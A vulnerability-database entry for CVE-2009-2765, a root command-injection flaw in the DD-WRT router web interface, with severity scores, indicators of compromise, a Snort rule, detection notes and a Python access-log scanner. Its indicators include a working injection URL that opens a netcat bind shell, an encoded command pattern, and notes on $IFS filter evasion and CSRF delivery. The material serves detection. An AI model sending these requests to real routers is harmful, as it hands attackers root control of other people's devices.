CVE-2009-2765
published 2009-08-14


Priority P180 high, 8.3 (CVSS 2.0)
AV:A/AC:L/Au:N/C:C/I:C/A:C
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 82.50% (99.6th percentile)

httpd.c in httpd in the management GUI in DD-WRT 24 sp1, and other versions before build 12533, allows remote attackers to execute arbitrary commands via shell metacharacters in a request to a cgi-bin/ URI.

Affected

1 ranges
Vendor    Product   Version range   Fixed in
dd-wrt    dd-wrt    <= 24

Detection & IOCs (extracted from sources)

url: http://routerIP/cgi-bin/;command_to_execute
url: http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
port: 5555
path: /cgi-bin/;
path: /tmp/exec.tmp
command: echo${IFS}-ne${IFS}"#{cmd}"|/bin/sh&
snort:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER Possible DD-WRT Metacharacter Injection Command Execution Attempt"; flow:established,to_server; http.uri; content:"/cgi-bin/|3B|"; nocase; pcre:"/\x2Fcgi\x2Dbin\x2F\x3B.+[a-z]/i"; reference:url,isc.sans.org/diary.html?storyid=6853; reference:url,www.theregister.co.uk/2009/07/21/critical_ddwrt_router_vuln/; reference:url,www.dd-wrt.com/phpBB2/viewtopic.php?t=55173; reference:bid,35742; reference:cve,2009-2765; classtype:attempted-admin; sid:2009678; rev:10; metadata:created_at 2010_07_30, cve CVE_2009_2765, confidence Medium, signature_severity Major, updated_at 2024_03_06;)
  • Detect HTTP GET requests to paths matching /cgi-bin/; (semicolon immediately after cgi-bin/); the semicolon is the shell metacharacter injection point. On the wire it is the byte 0x3B, which the rule above writes as |3B| following /cgi-bin/.
  • Whitespace in injected commands is replaced with the shell variable $IFS to bypass simple space-based filters; look for $IFS in HTTP URI fields as a strong indicator of exploitation.
  • The exploit payload pattern echo${IFS}-ne${IFS} piped to /bin/sh in the URI is a reliable indicator of the Metasploit module's encoded command execution technique.
  • The vulnerability is exploitable via CSRF — a crafted img tag or link on a third-party page can trigger the attack against a DD-WRT router owner without requiring an authenticated session.
  • The httpd process runs as root on affected DD-WRT devices; any successful command injection via /cgi-bin/; results in immediate root-level code execution.
  • The exploit writes a temporary shell script to /tmp/exec.tmp before execution; presence of this file on a DD-WRT device may indicate post-exploitation activity.
  • By default, DD-WRT's httpd does not listen on the WAN (outbound) interface, limiting direct remote exploitation; however, CSRF-based attacks bypass this restriction entirely.
  • The vulnerability affects DD-WRT 24 sp1 and all builds prior to build 12533; detections should be scoped to devices running firmware older than build 12533.
  • The Metasploit module requires a payload compatible with 'generic netcat-e'; other payload types may not function correctly against this target.
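
The indicators in the list above can also be checked offline against proxy or web-server access logs. The following is an added example, not part of the original page or of any vendor tooling: it goes slightly beyond the rule by percent-decoding the URI first, so %3B and double-encoded %253B are caught as well. The log layout, function names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Indicators described on this page; CGI_SEMI mirrors the rule's pcre.
CGI_SEMI = re.compile(r"/cgi-bin/;.+[a-z]", re.I)
IFS_VAR = re.compile(r"\$\{?IFS\}?")
ECHO_PIPE = re.compile(r"echo\$\{?IFS\}?-ne\$\{?IFS\}?.*\|\s*/bin/sh")
# Assumption: combined-log-style request field, "METHOD URI HTTP/x.y".
REQUEST = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

def decode_uri(uri, rounds=2):
    """Percent-decode up to `rounds` times so %3B and %253B both yield ';'."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def classify(line):
    """Return the indicator names matched by one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    uri = decode_uri(m.group("uri"))
    if not CGI_SEMI.search(uri):
        return []
    hits = ["cgi-bin-semicolon"]
    if IFS_VAR.search(uri):
        hits.append("ifs-whitespace")
    if ECHO_PIPE.search(uri):
        hits.append("echo-pipe-sh")
    return hits

# Constructed sample lines (placeholders, not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/;command_to_execute HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /CGI-BIN/%3Bcommand_to_execute%24IFSarg HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/%253Bcommand_to_execute HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /cgi-bin/;echo${IFS}-ne${IFS}%22PLACEHOLDER%22|/bin/sh& HTTP/1.1" 200 0',
]

def scan(lines):
    """Return (line_number, indicators) for every line with at least one hit."""
    return [(n, h) for n, line in enumerate(lines, 1) if (h := classify(line))]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, ",".join(hits))
```

A hit on cgi-bin-semicolon alone matches the rule's Medium confidence; the $IFS and echo-pipe indicators raise it, as the list above notes.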

CVSS provenance

nvd: v2.0, 8.3 HIGH, AV:A/AC:L/Au:N/C:C/I:C/A:C
vulncheck: 8.3 HIGH